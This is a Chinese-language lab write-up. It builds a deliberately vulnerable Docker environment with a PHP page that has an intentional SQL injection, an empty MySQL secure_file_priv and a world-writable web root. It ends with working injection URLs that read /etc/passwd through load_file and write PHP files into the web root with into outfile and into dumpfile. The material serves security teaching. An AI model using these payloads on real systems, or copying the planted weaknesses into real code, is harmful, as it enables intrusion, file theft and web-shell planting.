1. 利用docker搭建环境
1. Dockerfile编写
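# Base image for the lab. ubuntu:16.04 is end-of-life (no further security
# updates); it is kept because the rest of the writeup (MySQL 5.7 config path,
# PHP package names) was built against it. Pin by digest if the lab must be
# rebuilt reproducibly.
FROM ubuntu:16.04
# UTF-8 locale for container processes (key=value form; the space-separated
# ENV form is deprecated).
ENV LANG=c.UTF-8
# Non-interactive apt is a build-time concern only: an ARG is not baked into
# the runtime environment the way ENV was.
ARG DEBIAN_FRONTEND=noninteractive
# Mirror list shipped with the repo under ./docker.
COPY ./docker/sources.list /etc/apt/sources.list
# Install PHP with the Apache module, the MySQL server and the PHP extensions
# the challenge page uses. update + install live in one layer so a cached
# index can never be reused against a newer install; the index is dropped
# afterwards. The default /var/www/html content is cleared for the challenge.
RUN apt-get -y update && \
    apt-get -yqq install php libapache2-mod-php mysql-server php-mysql php-curl && \
    rm -rf /var/lib/apt/lists/* && \
    rm /var/www/html/*
# Turn off Apache directory listing (the stock Indexes option would expose the
# web root), and set secure_file_priv to empty so mysqld may read and write
# arbitrary files -- the latter is the deliberate weakness this lab exercises.
RUN sed -i 's/Options Indexes FollowSymLinks/Options None/' /etc/apache2/apache2.conf && \
    sed -i '$a secure_file_priv= ' /etc/mysql/mysql.conf.d/mysqld.cnf
# ADD rather than COPY on purpose: it auto-extracts the local challenge tarball.
ADD ./sources/CTF.tar /var/www/html/
# Seed SQL, loaded by start.sh at container start.
COPY ./docker/ctf.sql /root/
# Web-root ownership and permissions. World-writable is intentional here: the
# mysqld process (a different user) must be able to create files under the
# web root for the file-write part of the challenge. Never carry this into a
# production image; grant a specific user/group instead.
RUN chown www-data:www-data /var/www/html/* && \
    chmod 777 /var/www/html /var/www/html/*
# Startup script: starts MySQL, seeds the database, then runs Apache in the
# foreground. Services are started by this script, so the image stays root.
COPY ./docker/start.sh /root/
RUN chmod +x /root/start.sh
WORKDIR /root
# Exec form so the script is PID 1 and receives SIGTERM from `docker stop`.
ENTRYPOINT ["/root/start.sh"]
# Documentation only; publish the port with -p at run time.
EXPOSE 80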
2.start.sh
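#!/bin/bash
# Container entrypoint for the lab: bring up MySQL, set the root password,
# load the challenge schema, then hand PID 1 over to Apache.
# The root password below is also hard-coded in index.php; the two must agree.

# Brief pause before (re)starting the service.
sleep 1
service mysql restart

# Set the root password on the freshly installed server. No `set -e` on
# purpose: if the container is restarted with the password already set this
# step presumably fails (unverified), and that must not prevent Apache from
# starting.
mysqladmin -u root password "Cdusec123456"

# Load the challenge database. MYSQL_PWD is honoured by the mysql client and
# keeps the password off the command line (and so out of `ps` output) while
# behaving exactly like -p<password>.
MYSQL_PWD="Cdusec123456" mysql -u root < /root/ctf.sql

# exec so Apache replaces this shell as PID 1 and receives SIGTERM directly.
exec /usr/sbin/apache2ctl -D FOREGROUND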
3.ctf.sql
-- Challenge database: one admins table whose password column holds the
-- placeholder flag string that index.php prints back.
CREATE DATABASE IF NOT EXISTS ctfC;
USE ctfC;

CREATE TABLE IF NOT EXISTS admins (
    id       INT(10) PRIMARY KEY AUTO_INCREMENT,
    username VARCHAR(100),
    password VARCHAR(100)
);

-- Seed rows; ids are given explicitly rather than left to AUTO_INCREMENT.
INSERT INTO admins (id, username, password) VALUES
    ('1', 'admin',  'flag{flag_is_not_there}'),
    ('2', 'admin1', 'flag{flag_is_not_there}'),
    ('3', 'admin2', 'flag{flag_is_not_there}'),
    ('4', 'admin3', 'flag{flag_is_not_there}');
4.index.php
<?php
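class Mysql {
    // Connection settings and the live mysqli handle. Declared explicitly so
    // the class does not rely on dynamic properties (deprecated in PHP 8.2).
    public $servername;
    public $username;
    public $password;
    public $dbname;
    public $con;

    /**
     * Store the settings and open the connection immediately.
     * The defaults are the lab's hard-coded credentials and must match the
     * root password that start.sh sets on the MySQL server.
     */
    public function __construct($servername = "127.0.0.1", $username = "root", $password = "Cdusec123456", $dbname = "ctfC")
    {
        $this->servername = $servername;
        $this->username = $username;
        $this->password = $password;
        $this->dbname = $dbname;
        $this->con = $this->conn();
    }

    /**
     * Close the handle if one was opened. conn() terminates the script on
     * failure before $con is assigned, so guard against a missing handle.
     */
    public function __destruct()
    {
        if ($this->con) {
            $this->con->close();
        }
    }

    /**
     * Connect to MySQL and return the mysqli handle.
     * On a connection error the script terminates with the server's message.
     *
     * @return mysqli
     */
    public function conn()
    {
        $conn = new mysqli($this->servername, $this->username, $this->password, $this->dbname);
        if ($conn->connect_error) {
            die("连接失败: " . $conn->connect_error);
        }
        return $conn;
    }

    /**
     * Print every admins row matching $id and report whether any was found.
     *
     * $id is interpolated straight into the statement. This is the lab's
     * deliberate SQL-injection point, which the rest of the writeup depends
     * on; a hardened version would run a prepared statement and bind $id as
     * an integer (prepare()/bind_param()) so request input can never change
     * the query's structure.
     *
     * @param mixed $id value taken from the request
     * @return bool True when at least one row was printed, False otherwise
     *              (including a failed query, where query() returns false
     *              rather than a result object)
     */
    public function sel($id)
    {
        $sql = "SELECT * FROM admins WHERE id=$id";
        $result = $this->con->query($sql);
        // A failed or non-SELECT query yields no result object; treat as "no rows".
        if (!($result instanceof mysqli_result) || $result->num_rows == 0) {
            return False;
        }
        while ($row = $result->fetch_assoc()) {
            echo "id: " . $row['id'] . " - Name: " . $row['username'] . " -Password: " . $row['password'] . "<br>";
        }
        return True;
    }
}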
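// Entry point: look up the requested id and print whether anything matched.
// isset() avoids an undefined-index notice when no id is supplied; the empty
// string produces the same malformed query (and the same "NO") as null did.
$id = isset($_GET['id']) ? $_GET['id'] : '';
$sql = new Mysql();
$re = $sql->sel($id);
if ($re) {
    echo "Congratulations";
} else {
    echo "NO";
}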
2.文件写入条件
1.读写文件需要 secure_file_priv 权限
secure_file_priv = ''      //代表对文件写入没有限制
secure_file_priv = NULL    //代表不能进行文件读写
secure_file_priv=/var/tmp  //代表不能进行文件写入操作
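# Append `secure_file_priv= ` (empty value) to /etc/mysql/mysql.conf.d/mysqld.cnf
# -- the same path the Dockerfile edits. `$a` is sed's append-after-last-line
# command. The space between the closing quote and the path is required:
# without it the shell joins the path onto the sed expression as one argument,
# sed gets no file and waits on stdin instead of editing the config.
sed -i '$a secure_file_priv= ' /etc/mysql/mysql.conf.d/mysqld.cnf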
2.读取文件
Load_file()
http://192.168.74.138:21101/?id=1 union select 1,'2',load_file('/etc/passwd') --+
3.写入文件
into outfile
or into dumpfile //用于二进制文件
http://192.168.74.138:21101/?id=1 union select 1,'<?php phpinfo();?>',3 into outfile '/var/www/html/1.php' --+
http://192.168.74.138:21101/?id=1 union select 1,'<?php phpinfo();?>',3 into dumpfile '/var/www/html/5.php' --+
Q.E.D.